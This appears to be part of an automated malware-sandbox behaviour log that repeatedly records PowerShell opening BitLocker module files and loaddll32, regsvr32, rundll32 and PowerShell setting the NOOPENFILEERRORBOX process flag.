Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
